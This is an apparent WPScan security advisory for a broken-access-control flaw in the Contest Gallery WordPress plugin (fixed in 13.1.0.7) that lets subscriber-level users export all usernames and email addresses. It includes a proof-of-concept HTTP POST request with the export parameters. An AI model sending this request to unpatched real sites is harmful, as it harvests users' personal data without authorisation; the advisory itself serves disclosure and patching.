WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Contest Gallery < 13.1.0.7 - Subscriber+ Email Address Disclosure

Description

The plugin does not have any proper access controls when exporting users from a gallery, which could allow any authenticated users (such as subscriber)  to list all users from the blog, disclosing their username and email address

Proof of Concept

POST /wp-admin/admin.php?page=contest-gallery/index.php&users_management=true&option_id=1 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
Connection: close
Cookies; [subscriber+]
Upgrade-Insecure-Requests: 1

cg_create_user_data_csv_new_export=true&cg_create_user_data_csv=1

Affects Plugins

contest-gallery
Fixed in version 13.1.0.7

Classification

Type

ACCESS CONTROLS

OWASP top 10
A5: Broken Access Control
CWE
CWE-284

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID
71eb90f2-bad2-4de7-9335-02697aee9ffe

Timeline

Publicly Published

2021-11-01 (about 9 months ago)

Added

2021-11-01 (about 9 months ago)

Last Updated

2021-11-01 (about 9 months ago)

Our Other Services

WPScan WordPress Security Plugin